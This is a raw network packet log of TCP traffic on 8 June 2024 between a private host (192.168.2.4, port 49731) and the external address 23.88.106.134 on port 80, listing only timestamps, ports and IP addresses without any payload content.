Jun 8, 2024 20:22:01.496694088 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.496718884 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.496771097 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.496786118 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.496825933 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.496861935 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.502985001 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.503000975 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.503016949 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.503031969 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.503050089 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.503057003 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.503066063 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.503087997 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.503096104 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.503113031 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.503113031 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.503132105 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.503146887 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.503148079 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.503165007 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.503180981 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.503186941 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.503197908 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.503215075 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.503221035 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.503240108 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.503242970 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.503257990 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.503277063 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.503279924 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.503289938 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.503317118 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.503336906 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.503882885 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.503899097 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.503914118 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.503974915 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.503999949 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.504525900 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.504587889 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.504620075 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.504636049 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.504652023 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.504668951 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.504684925 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.504684925 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.504700899 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.504718065 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.504722118 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.504731894 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.504743099 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.504757881 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.504775047 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.504776001 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.504792929 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.504812956 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.504833937 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.505153894 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.505171061 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.505187035 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.505218983 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.505243063 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.505320072 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.505337954 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.505352020 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.505367994 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.505382061 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.505383968 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.505400896 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.505403042 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.505444050 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.505470037 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.505685091 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.505750895 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.505954027 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.505980015 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.505996943 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.506012917 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.506016970 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.506030083 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.506037951 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.506046057 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.506061077 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.506063938 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.506103039 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.506124020 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.506129980 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.506148100 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.506164074 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.506181002 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.506184101 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.506198883 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.506201982 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.506216049 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.506223917 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.506236076 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.506253958 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.506272078 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.506272078 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.506290913 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.506293058 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.506328106 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.506405115 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.507232904 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.507250071 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.507266045 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.507282019 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.507294893 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.507298946 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.507316113 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.507317066 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.507358074 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.507373095 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.507378101 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.507399082 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.507415056 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.507427931 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.507430077 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.507447004 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.507448912 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.507463932 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.507469893 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.507482052 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.507489920 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.507498980 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.507515907 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.507527113 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.507534027 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.507546902 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.507551908 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.507570982 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.507587910 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.507611036 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.508156061 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.508172989 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.508188963 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.508220911 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.508258104 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.508291960 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.508307934 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.508323908 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.508338928 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.508347988 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.508357048 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.508373022 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.508378983 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.508392096 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.508409977 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.508419991 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.508435011 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.508440971 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.508460045 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.508470058 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.508507967 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.508512974 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.508533001 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.508548021 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.508549929 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.508568048 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.508568048 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.508588076 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.508589983 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.508608103 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.508627892 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.508656979 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.509180069 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.509205103 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.509227991 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.509244919 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.509251118 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.509264946 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.509273052 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.509299040 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.509320974 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.509336948 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.509361029 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.509377956 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.509393930 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.509392977 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.509412050 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.509413004 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.509428978 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.509438038 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.509445906 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.509462118 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.509476900 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.509475946 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.509493113 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.509496927 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.509510040 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.509526968 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.509531021 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.509545088 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.509567022 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.509593964 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.510199070 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.510215998 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.510232925 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.510248899 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.510265112 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.510265112 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.510293961 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.510314941 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.510324001 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.510348082 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.510364056 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.510375023 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.510380983 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.510399103 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.510415077 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.510416031 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.510431051 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.510442019 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.510448933 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.510466099 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.510468006 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.510482073 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.510504961 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.510514021 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.510545015 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.510571003 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.511451960 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.511468887 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.511485100 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.511502028 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.511518002 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.511518955 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.511535883 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.511553049 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.511557102 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.511569977 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.511576891 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.511588097 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.511605024 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.511605978 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.511639118 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.511662006 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.617100000 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.617134094 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.617150068 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.617167950 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.617186069 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.617204905 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.617207050 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.617225885 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.617255926 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.617275000 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.617280960 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.617281914 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.617290974 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.617309093 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.617317915 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.617350101 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.617357969 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.617367983 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.617384911 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.617388010 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.617403984 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.617414951 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.617422104 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.617448092 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.617449999 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.617511988 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.617516994 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.617533922 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.617537975 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.617561102 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.617574930 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.617594957 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.617595911 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.617620945 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.617633104 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.617656946 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.617688894 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.617690086 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.617727041 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.617747068 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.617760897 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.617789030 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.617799044 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.617813110 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.617834091 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.617855072 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.617870092 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.617894888 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.617918968 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.617924929 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.617960930 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.617983103 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.617995024 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.618026018 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.618026972 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.618061066 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.618062019 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.618098021 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.618098021 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.618120909 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.618136883 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.618160009 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.618191004 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.618205070 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.618243933 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.618244886 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.618283987 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.618294001 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.618319035 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.618341923 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.618352890 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.618380070 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.618402958 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.618406057 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.618441105 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.618463993 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.618474960 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.618506908 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.618508101 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.618530035 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.618544102 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.618558884 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.618582010 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.618602037 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.618616104 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.618635893 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.618669987 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.618674040 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.618705034 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.618727922 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.618740082 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.618767977 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.618776083 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.618792057 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.618804932 CEST	80	49731	23.88.106.134	192.168.2.4
